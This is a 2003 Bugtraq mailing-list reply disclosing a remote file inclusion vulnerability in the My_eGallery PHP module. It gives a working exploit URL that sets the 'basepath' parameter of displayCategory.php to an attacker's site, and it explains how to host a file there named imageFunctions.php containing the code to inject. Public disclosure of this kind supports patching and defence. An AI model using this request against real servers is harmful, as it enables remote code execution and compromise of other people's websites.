Date: Sun, 30 Nov 2003 01:16:31 +0100
From: Fauvet Ludovic <etix@...box.com>
To: bugtraq@...urityfocus.com
Subject: Re: Remote execution in My_eGallery

Hi,
There is some php scrits which are vulnerables.
One of these is displayCategory.php .
So you just have to go to:
http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com
And create a directory "public" in the root of your website and put a
file named imageFunctions.php with the code you want to inject.

--

Best regards,